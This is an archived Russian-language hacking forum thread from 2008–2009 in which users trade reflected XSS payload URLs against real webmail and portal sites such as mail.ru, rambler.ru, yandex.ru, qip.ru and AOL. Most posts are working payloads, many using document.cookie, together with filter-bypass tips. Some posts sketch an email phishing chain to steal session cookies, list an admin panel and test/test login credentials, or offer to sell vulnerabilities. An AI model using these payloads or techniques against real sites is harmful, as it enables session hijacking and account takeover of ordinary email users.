Вход

Просмотр полной версии : Пассивные xss на почтовых серверах


Constantine
25.10.2008, 15:54
Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема)

Оффтоп наказуем

p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету

TreV@N
26.10.2008, 11:32
rambler.ru

http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert%20('XSS')%3C/script%3E

cash$$$
26.10.2008, 21:55
http://top100.rambler.ru/cgi-bin/reg...p=0&reg=accept

Во всех полях вставляем "><script>alert('xss')</script>

http://goon.ru/i/phone/rus_moscow.htm

В поле Поиск по фамилии "><script>alert('xss')</script>

http://catalog.aport.ru/rus/add/AddUrl.aspx

В Адрес ресурса вставляем "><script>alert('xss')</script>

TreV@N
27.10.2008, 06:26
Ramber.ru

http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>alert(/TreV@N/)</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert('TreV@N')</script>&form=0&hu=1&what=0

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&what=0"><script>alert('TreV@N')</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script>alert('TreV@N')</script>&hu=1&what=0

S0ulVortex
15.11.2008, 22:41
Решил выложить XSS найденную лично мной
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

foopi
20.11.2008, 00:23
пара уязвимостей на qip:
http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E

.dimoN.
20.11.2008, 01:22
Решил выложить XSS найденную лично мной
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
по твоему же примеру
http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS %27)%3C%2Fscript%3E

cash$$$
22.11.2008, 02:28
http://inbox.uz/
'><script>alert(/xss/)</script>
Уязвимые поля Логин и пароль.

Ded MustD!e
23.11.2008, 20:45
http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>
http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script>
http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>
http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cookie)</script>
http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script>
http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>
http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>
http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>
http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

Luccifer
25.11.2008, 16:57
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer')</script>

http://top100.rambler.ru/cgi-bin/register.cgi?group=49&reg=accept
в поле URL Вашей страницы:
Код:
"><script>alert(document.cookie)</script

Luccifer
25.11.2008, 16:59
Mail.сру
http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E

http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phrase=&proto=1&url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3 C%2Fscript%3E&title=&descr=&owner=&cperson=&email=&phone=&fax=&address=&keywords=&session_id=16073130&category_id=10993&category_name=%CC%E5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4% EE%F0%EE%E2%FC%E5&page=1&save=1

http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fscr ipt%3E&password=


http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fsc ript%3E&tld=ru&x=21&y=4


http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470


http://hosting.mail.ru/
в поле логин вводим
Код:
"><script>alert('xss')</script>

ImpLex
14.12.2008, 17:56
http://ds.rambler.ru/index.php?p=news&pubId=00000000000000000000000000000000000000000000 0003&pubMode=%3Cscript%3Ealert()%3C/script%3E
Была активная XSS, но топик для пассивных.

S0ulVortex
19.12.2008, 22:20
Ну опять хсс убитого рамблера на котором даже те что есть не фиксят.
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5&form=0&hu=1&what=0

</title><script>alert('S0ulVortex')</script>

Jazz
26.12.2008, 11:24
http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470

уже не работают?или я не то делаю?

faza02
26.12.2008, 11:31
не работают.
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20 f02')%3C/script%3E
эта работает.

The matrix
31.12.2008, 21:21
Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно
http://miss.rambler.ru/srch/?sort=0&set=miss&words=%22%3E%3Cscript%3Ealert(/hacker?/)%3C/script%3E

iddqd
04.01.2009, 15:37
Gala.net
http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and

iddqd
04.01.2009, 18:14
ВШтате
http://vshtate.ru/reg?op=message&email=[XSS]
Но если авторизован, то не пашет :(
Короче, бесполезная :(
В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде.
Непохек :(

baltazar
05.01.2009, 16:05
Facebook.com




http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3 C/script%3E%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E


только толку от нее нету:(

lmns
10.01.2009, 22:33
http://yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert("XSS%20from%20lmns")</script>

iddqd
12.01.2009, 18:52
Мой Круг [Яндекс]

http://moikrug.ru/mates/search/all/russia/?search="/>XSS

iddqd
13.01.2009, 13:36
m@il.com

http://mail01.mail.com/scripts/help/help.cgi?type=search&lang=us&string=XSS

iddqd
13.01.2009, 23:22
МИРТЕСЕН

http://mirtesen.ru/groups/map#search&<script>alert(document.cookie)</script>

Прошу модераторов простить меня за то, что я отхожу от тематики почтовых серверов- но думаю, социальные сети можно приравнять к ним по важности.

iddqd
15.01.2009, 13:45
Снова i.ua - на этот раз пассивка ;)

http://events.i.ua/search/?words=</title>XSS&type=text

TreV@N
16.01.2009, 19:24
http://mail.kinozal.tv/

http://kinozal.tv/login.php?returnto={XSS}

TreV@N
16.01.2009, 19:31
http://webmail.rin.ru/

http://search.rin.ru/?text={XSS}

Zikko
23.01.2009, 20:37
на сайте http://www.mylivepage.ru в поле для поиска
"><script>alert('xss')</script>

Dimi4
27.01.2009, 22:49
META.UA (Поисковик, почта...)
http://meta.ua/ua/?rgn=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&ur

Ну и так, в придачу rutube.ru :D + раскрытие путей

http://ru tube.ru/channels.html?dir=asc&order_by=alias%22%3E%3Cimg%20src=javascript:alert( document.cookie)%3E
/var/virtual/rutube.ru/lib/Rutube/Obj/Channel.pm line 658

Sin3v
31.01.2009, 23:20
Mail.ru
http://hosting.mail.ru/lc.jsp?loginput=&login=123&password=%22%3E%3Cscript%3Ealert(%27Sin3v%27)%3C/script%3E

TreV@N
04.02.2009, 07:20
e-mail.ru

http://www.e-mail.ru/webmail.ok?cmd=calendar&month={xss}

Найдена лично мной

Sin3v
06.02.2009, 15:02
e-mail.ru

http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert(%27Sin3v %27)%3C/script%3E

А это лично мной)

MaDfUn
17.02.2009, 19:41
Работает в IE
http://sysadmin.mail.ru/pforum/profile.php?mode=viewprofile&u="><script>alert(/xss/)</script>

iddqd
18.02.2009, 14:29
A.UA - унылый веб2.0 сервис (бета)
http://web20.a.ua/searchresults?query=[XSS]&stype=all
http://web20.a.ua/slovo?query=[XSS]&stype=word
http://web20.a.ua/radio?query="/>[XSS]&stype=radio

и так далее

Sleep
03.03.2009, 13:55
http://horoscopes.rambler.ru/astrosystems.html?sid=47670&sign=203672&sec=2036571"><script>alert(document.cookie)</script>

тестил в Опере

Dr.Frank
11.03.2009, 22:39
http://news.mail.ru/politics/2416467'%20onmouseover='javascript:alert(document. cookie)';a='/useit/

Для реализации надо навести мышкой на поле ввода

Shaitan-Devil
12.03.2009, 09:38
yandex

http://old-kubok.yandex.ru/cgi/cert.pl?s=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

xcedz
27.03.2009, 00:13
http://go.mail.ru/frame.html?imgurl=xss

иддкд
05.04.2009, 02:22
http://gallery.icq.com/browse.php?search=search&term=%3Cscript%3Ealert(document.cookie)%3C/script%3E

xcedz
09.04.2009, 02:46
http://paint.kards.qip.ru/compose/edit/2292/?card_id=xss

2fed
09.05.2009, 00:32
phpinfo
http://fo2.rambler.ru/info.php phpinfo

хсс
http://help.rambler.ru/feedback.html?s=7715&fio=%22%3E%3Cscript%3Ealert(/2fed/)%3C/script%3E

админка
http://in.fo2.rambler.ru/administrator/index.php?

и ещё
http://ad.rambler.ru/
CLIENTS LOGIN

логин=test
пасс=test

wildshaman
10.05.2009, 18:43
Пассивка на mail.ru, работает онли в хроме:

http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,501,20,9&element=1&code="><script>alert(document.cookie)</script>

FatalLerr0r
21.05.2009, 20:45
Пассивка на qip.ru
http://video.qip.ru/broadcast/view/?id=2172438&from="><script>alert('XSS by FatalLerr0r')</script>

Sin3v
26.07.2009, 07:38
Mail.ru
Работает через пост запрос в поле E-Mail
http://device.mail.ru/published/forgot.php

edge911
31.07.2009, 19:00
на yandex.ru создаем новое событие в календаре,
назваагние пишем любое , в описание <img src = http://artfile.ru/funfoto/b/v/1939_26_186_ArtFile_ru.jpg onload = alert(123);>
при просмотре события вылазит алерт"123"
p.s сори еси не туда написал )

Sleep
17.08.2009, 01:02
http://g1.botva.mail.ru/registration.php?race=1<'><script>alert(document.cookie)</script>

JOHNik
20.08.2009, 00:41
http://translate.google.com/translate?hl=ru&sl=en&tl=ru&u=http%3A%2F%2Fforums.xmbforum.com%2Ffiles.php%3Fp id%3D1361320%26aid%3D20274
http://translate.google.co.uk/translate?hl=ru&sl=en&tl=ru&u=http%3A%2F%2Fforums.xmbforum.com%2Ffiles.php%3Fp id%3D1361320%26aid%3D20274
То же самое и тут (PREF TM LM S)
такая же трабла и с AOL например:
http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>
просто это не те которые нужны. :( но идея с переводом документа хорошая

satana-fu
25.08.2009, 19:38
http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>
просто это не те которые нужны. :( но идея с переводом документа хорошая

там же, куча пассивок, вывешивать не стал чтоб не флудить, но xss на каждом шагу, щя поищу активку

https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cac%3aWS%7cat%3 aSNS%7cld%3awebmail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aAOL%7csnt%3aScreenName&offerId=mail-second-en-us&seamless=%22%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E

satana-fu
30.08.2009, 07:09
пассивная XSS на рамблер, только что нашел

http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&uid=4513&page=200&num=5&end=080911&type=16&start=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E0&iid=27203

http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&page=206&uid=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E3&end=080911&type=16&iid=27203&start=080910

Правда в этой строке их до фига и больше...

xss-faq
01.09.2009, 17:25
xss mail.ru
http://wifi.mail.ru/comments.html?point_id=6568&thread="><script>alert(document.cookie)</script>
xss yandex.ru
http://images.yandex.ru/cgi-bin/customize.pl?retpath=http://yandex.ru/yandsearch?text="><script>alert(document.cookie)</script>
Сам искал! :p

vitaliy_n73
09.09.2009, 00:01
Вот пару месяцев назад нашел,думал буду пользоватся,ща как-то не пригодилось так чтоб зря не пропадала берите пользуйтесь на здоровье!


http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ealert()%3C/script%3E

Travakur555
15.09.2009, 21:21
http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert(%27Sin3v %27)%3C/script%3E

Sin3v
16.09.2009, 14:42
Mail.ru
http://kv.mail.ru/game/create_character.php?name=%22%3E%3Cscript%3Ealert% 28document.cookie%29%3C/script%3E

Работает у авторизованных.

Ruslan1817
21.09.2009, 21:48
за что вы мои XSS удаляете ?

Я их сам находил...

http://www.netman.ru/contacts.phtml в поле имя и фамилия вводим
<'<"><script>alert('XSS')</script><

Ruslan1817
23.09.2009, 13:02
http://horoscopes.rambler.ru/astrosystems.html?sid=47670&sign=203672&sec=203657 1"><script>alert(document.cookie)</script>

satana-fu
24.09.2009, 15:39
пассивка на рамблере

http://id-planet.rambler.ru/main/user/blacklist
строка Найти забаненного
<img src=foo.png onerror=alert(document.cookie) />


еще одна пассивка на рамблер

http://autorambler.ru/cars/by-price/?price_from=%27%3E%3Cscript%3Ealert%28document.coo kie%29%3C%2Fscript%3E&raz=1&price_to=250000&model=303&skip=0&currency=RUR

Ruslan1817
24.09.2009, 16:57
http://torg.mail.ru/844/res/?&"><script>alert(document.cookie)</script>[sort]=2

Ruslan1817
24.09.2009, 17:03
http://torg.mail.ru/835/138479/?%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Etab_id=2

satana-fu
24.09.2009, 17:09
первый раз сам нашел... на майле... правда с подсказкой :-)
это тоже твой xss, нашел уже с твоей подсказкой

http://torg.mail.ru/109/res/?"><script>alert(document.cookie)</script>[vendor_id][]=49

Ruslan1817
24.09.2009, 17:30
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1"><script>alert('Sin3v')</script>
от Sinva

подправил
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1%3Cimg%20src=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

satana-fu
27.09.2009, 04:37
все пассивки прикрыли... как так 0_0

а ты развивай ту. которую начал)))), вот тебе еще пассивка на майл

http://torg.mail.ru/844/res/?%27p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C%2Fscript%3E

улови какая разница между вышестоящим и этим урл ниже

http://torg.mail.ru/844/res/?p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28docu ment.cookie%29%3C%2Fscript%3E

как только догонишь, найдешь кучу пассивных xss на майле ;) не забудь убрать пробелы

Ruslan1817
28.09.2009, 06:16
мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

darkwkz
28.09.2009, 13:41
one.lv
http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C/script%3E

Details
29.09.2009, 17:03
http://www.pochta.ru/games/?ids=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E :cool:

Details
29.09.2009, 17:39
мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

Уже прикрыли)) :D

Ruslan1817
30.09.2009, 11:00
http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(document.cookie)</script>

Тока не орем))
Тут мне прислали письмо с QUELLE ( заказывал себе хрень одну ) при вводе скрипта в адресную строку я получил свои куки, но на других эта XSS не работает т.к. соответственно письмицо у них отсутствует :( ... есть какие небудь предложения по этому поводу ? Если надо выложу скрин.

darkwkz
30.09.2009, 22:52
inbox.lv забугорный сайтец.
http://help.inbox.lv/?language=%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Ruslan1817
05.10.2009, 20:19
http://story.travel.mail.ru/?<'<"><script>alert('Ruslan1817')</script><mod=story&country_id=44

http://story.travel.mail.ru/?%3C'%3C%22%3E%3Cscript%3Ealert('Ruslan1817')%3C/script%3E%3Cmod=story&country_id=44

Travakur555
06.10.2009, 04:39
http://story.travel.mail.ru/?<'<"><script>alert('Ruslan1817')</script><mod=story&country_id=44

http://story.travel.mail.ru/?%3C'%3C%22%3E%3Cscript%3Ealert('Ruslan1817')%3C/script%3E%3Cmod=story&country_id=44
Чтот не рабочии твои хсс :D

darkwkz
06.10.2009, 16:41
http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C/script%3E сообщил администрации, в общем можно сказать получил 120 $ ))

darkwkz
06.10.2009, 16:54
Хxsка на сайте Латвийского оператора, я им сообщил птм они мне звонили и в общем уже 3 дня прошло а залатать не могут.В общем там тоже можно считать как эмайл...
http://zeltazivtina.lv/ru/search?q=%22%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E
Там в поиске еще активка есть)

Ruslan1817
07.10.2009, 20:37
http://story.travel.mail.ru/?mod%3C'%3C%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C=story&city_id=183615

satana-fu
12.10.2009, 18:30
XSS на юкозe (работает только у авторизованных админов сайта)

http://сайт на юкозе.ru/tmpls/?a=fm;n="><script>alert(document.cookie)</script>;ffilter=video;f=auth?ljcUik


Не почтовый сервер, просто не нашел куда засунуть его :rolleyes:

Gefasto
16.10.2009, 11:15
Пассивная xss на ngs.ru
http://expert.ngs.ru/search/?q=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28doc ument.cookie%29%3C%2Fscript%3E&t=1&r=0

Ruslan1817
18.10.2009, 23:25
http://travel.mail.ru/news/46607/?%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3E&page=1

думал уже все прикрыли =))

Ruslan1817
19.10.2009, 23:43
http://content.mail.ru/help/&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3E
Так же продам пассивки XSS

mailbrush
21.10.2009, 22:16
http://www.google.com.ua/imgres?imgurl=http://gogole.com&imgrefurl=IFRAME_HERE&h=254&w=340&sz=15D0%25B8%25D1%2582%25D0%25B1%25D1%2583%25D0%25 BB%25D1%258C%25D1%2582%25D0%25B5%25D1%2580%25D1%25 8C%25D0%25B5%25D1%2580&hl=ru&usg=__UzxB7H_92zpHrCDSG-bR5itVNg4=&ei=Lk7fSvurCI-lsAbN0_GlDg&sa=X&oi=image_result&resnum=4&ct=image&ved=0CAwQ9QEwAwIFRAME

Irdis
22.10.2009, 17:07
http://calendar.yandex.ru/event-add?show_date=2009-10-22&view_type=%22%27%3E%3Cscript%3Ealert%28%27Irdis%27 %29%3C/script%3E

satana-fu
23.10.2009, 16:51
пассивки на рамблер

http://id-planet.rambler.ru/default/friends/search/?do_friends_search=1&firstname=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Dale rt%28%2F%D0%98%D0%BC%D1%8F%2F%29+%2F%3E+&lastname=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Daler t%28%2F%D0%A4%D0%B0%D0%BC%D0%B8%D0%BB%D0%B8%D1%8F% 2F%29+%2F%3E+&external_id=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Da lert%28%2F%D0%9B%D0%BE%D0%B3%D0%B8%D0%BD%2F%29+%2F %3E+&service_id=

Работает только у авторизованных (пробелы убрать)

Ruslan1817
23.10.2009, 17:40
http://travel.mail.ru/?'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Ecity_from=1&countryid=1934&countryidtxt=& cityid=1500&cityidtxt=&hotelidtxt=&inp_mode=sel&ca t4=on&cat5=on&price=%3Cimg+src%3D%22javascript%3Aa lert%28document.cookie%29%22%3E&p_mode=1&p_type=2& nights1=%3Cimg+src%3D%22javascript%3Aalert%28docum ent.cookie%29%22%3E&nights2=%3Cimg+src%3D%22javasc ript%3Aalert%28document.cookie%29%22%3E&date1_d=1& date1_my=10_2009&date2_d=22&date2_my=11_2009&HB=on &STD=on&comments=%3Cimg+src%3D%22javascript%3Aaler t%28document.cookie%29%22%3E&mod=custom_order_tour

zpurgenz
25.10.2009, 17:00
http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(document.cookie)</script>

По поводу этой штуки работает многоходовка, да и работает ли...?
Отсылаем мыло. В мыле img на вашем сайте, который запустит скажем php скрипт который узнает рефер (id письма) и вышлет еще одно письмо. С ссылкой XSS на первое письмо....
Даже если первое письмо удалят, оно валяется в удаленных и все равно сработает, т.к. второе письмо прилетит как только откроют перовое... НО надо ведь, что бы первое письмо открыли, а во втором письме прошли по ссылке :) конечно если разослать миллиону товарищей то возможно эффект будет... :)

ЗЫ Совсем забыла, XSS работает если в письме есть вложение.

satana-fu
26.10.2009, 17:58
пассивная xss на qip.ru


работает только у авторизованных
http://file.qip.ru/account/myAccount.jsp?sId="><script>alert(document.cookie)</script>

http://file.qip.ru/account/settings.jsp?sId="><script>alert(document.cookie)</script>

Ruslan1817
28.10.2009, 18:17
http://www.yandex.ru/?add=3188&'><''>"><script>alert(/XSS/)</script>edit=1#widgetAdded

после выберам " Авто
рассчитай стоимость "

и вылазеет XSS !
Знаю что хрень но все же...

satana-fu
29.10.2009, 04:45
пассивка на mаil.ru, работает только у авторизованных

http://hosting.mail.ru/options.jsp?email="><script>alert(document.cookie)</script>



пассивка на mаil.ru, точку в адресе сниффера ставить в урл уникоде, иначе фильтр может заменить точку в урл на нижнее подчеркивание


http://story.travel.mail.ru/?"><script>alert(/xss/)</script>metro_id=4&mod=custom_order_tour&city_from=1&countryid=51
&countryidtxt=&cityid=-1&cityidtxt=&hotelidtxt=&inp_mode=sel&cat3=on
&cat4=on&cat5=on&price=3000&p_mode=1&p_type=2
&nights1=7&nights2=14&date1_d=1&date1_my=10_2009&
date2_d=19&date2_my=10_2009&HB=on&STD=on&comments=

Ruslan1817
29.10.2009, 21:43
http://berserk.mail.ru/index.php?'%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Eid=239

_Spamer_
31.10.2009, 20:25
mail.ru
имя: '"/><script>alert("xss");</script>
© хз:)

Ruslan1817
03.11.2009, 18:14
http://11x11.mail.ru/xml/main/register.php?type=main/register&act=insert в логин вводим '><''>"><script>alert(/Ruslan1817/)</script>

http://11x11.mail.ru/xml/main/send.php?type=main/register&act=sendagain

тоже самое вводим )

Ctacok
05.11.2009, 10:52
http://email.int.ru/cod/site.php?url=http://mail.live.com&title="><script>alert();</script>

Ruslan1817
05.11.2009, 16:59
http://tv.ukr.net/rew/g/07112009/bid141/id19229/tmnow/#index.html в поле

http://kino.ukr.net/cinema/kiev/batterfljaj-de-luxe/2#board

Имя*:
E-mail:
Сообщение*: '><''>"><script>alert(document.cookie)</script>


печенюГа))

исправил на латынь !!!

http://pic.ipicture.ru/uploads/091105/ZYDf5AX74W.jpg
____________________________________________

тут есть дырка фильтре, но никак не могу доработать скрипт :( Кто поможет ?
http://job.ukr.net/resume/?AdvancedSearch=0&ShowSearchResults=1&Keywords=%&RegionId=0

satana-fu
06.11.2009, 16:36
тут есть дырка фильтре, но никак не могу доработать скрипт :( Кто поможет ?
http://job.ukr.net/resume/?AdvancedSearch=0&ShowSearchResults=1&Keywords=%&RegionId=0

такой вариант годится?

http://job.ukr.net/personal/resume/new/?event=Add&Photo%5Bthmb%5D=&Photo%5Bfull%5D="><img src=foo.png onerror=alert(document.cookie) />&RegionId=0&AgreementConfirm=1

Ruslan1817
07.11.2009, 12:45
http://shop.deti.mail.ru/series/13993/?order=name&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Eway=forward
есть контакт )

далее идем -->шаг 1 --> выбераем подарок--> шаг 2--> везде указываем '><''>"><script>alert(document.cookie)</script> --> шаг 3 -->
Курьер : С.-Петербург --> везде указываем '><''>"><script>alert(document.cookie)</script> --> шаг 4 --> наличными --> жмакаем далее и уау! :)

Все !

Ruslan1817
07.11.2009, 16:25
http://berserk.mail.ru/index.php?'%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Eid=239

http://berserk.mail.ru/berserk49.html?'%3E%3Cscript%3Ealert(/document.cookie/)%3C/script%3E
=))

Ruslan1817
08.11.2009, 12:04
http://soft.mail.ru/s_result_softclub.php?qs=1&words=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28 %2FXSS%2F%29%3C%2Fscript%3E

в фильтре есть дырка ... кто сможет реадизовать ?

Ruslan1817
08.11.2009, 19:19
http://story.travel.mail.ru/?city_from=1&countryid=1934&countryidtxt=%C0%E1%F5%E0%E7%E8%FF&cityid=1500&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Ecityidtxt=%C3%E0%E3%F0%FB&hotelidtxt=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Eale rt%28%2FXSS%2F%29%3C%2Fscript%3E&inp_mode=inp&price=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28 %2FXSS%2F%29%3C%2Fscript%3E&p_mode=1&p_type=1&nights1=0&nights2=0&date1_d=1&date1_my=11_2009&date2_d=8&date2_my=12_2009&comments=&mod=custom_order_tour



http://travel.mail.ru/?mod=companions&res=1&self_id=1&look_for_id=2&age_from=&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3Eage_to=&account_region_id=0&geo_id=0&days_cnt_id=0&date1=08.11.2009&date2=08.12.2009

Ruslan1817
11.11.2009, 12:11
заходим сюды ---> http://travel.mail.ru/ слева вводим в поля " Город " , " Дата приезда - Дата отъезда " '><''>"><script>alert(document.cookie)</script> ---> найти отель !
WTF? печеькО )))

Ruslan1817
11.11.2009, 20:15
http://content.mail.ru/cgi-bin/list.cgi в поле организация вставить '><''>"><script>alert(document.cookie)</script> и тут полетит печеняГа))

Ruslan1817
20.11.2009, 01:24
Все XSS тока для авторизированных!!! ( на майле 11 x 11 тока при получении письма )

http://vkrugudruzei.ru/user/advert/advert.asp?uid=7155524&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28docume nt.cookie%29%3C/script%3E

http://11x11.mail.ru/xml/office/mail.php?id=18&type=office/mail&act=message&mode=1'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

Кому надо еще XSS от вкругу друзей? стучим ногами в личку!


BlackSun -- тока умеешь -минусы ставить ? достал уже!

Ruslan1817
22.11.2009, 22:18
Заходим сюда ---> http://travel.mail.ru ---> выбераем вклаку взять собой ( МТС ) ---> добавить ( ставим галку ) ----> <IMG SRC="javascript:alert( document.cookie );">
0_o ... WTF?
Как было тяжко без ачата :)

Ruslan1817
23.11.2009, 09:48
http://11x11.mail.ru/?&url='%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&do=logout
работает тока у авторизированных !

satana-fu
23.11.2009, 10:17
http://11x11.mail.ru/?&url='%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&do=logout
работает тока у авторизированных !


так гораздо лучше
http://11x11.mail.ru/?&url="><script>alert(document.cookie)</script>

запрос do=logout в ссылке означает выход из почтового ящика, а мы знаем, что кукисы умирают, как только нажмешь Выход, поэтому последние строки do=logout из ссылки убери, иначе сохранять будешь мертвые кукисы....

Ruslan1817
26.11.2009, 16:38
Не знал куда можно скинуть...

http://nigma.ru/index.php?s='><''>"><script>alert(document.cookie)</script>

Ruslan1817
02.12.2009, 18:19
http://search.icq.com/search/img_results.php?q=%27%3E%3C%27%27%3E%22%3E%3Cscrip t%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&ch_id=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

Ruslan1817
02.12.2009, 23:28
Продолжаем :)

Заходим сюды ---> Зарегистрироваться и разместить рекламу ----> вводим любые данные ----> выбераем что будем продавать ----> уязвимое поле " нофелет "
'><script>alert(/XSS/)</script>

Root-access
03.12.2009, 17:36
Yandex XSS: http://mail.yandex.ru/classic/abook_person?ids=1\');'>');}</script><script>alert()</script>

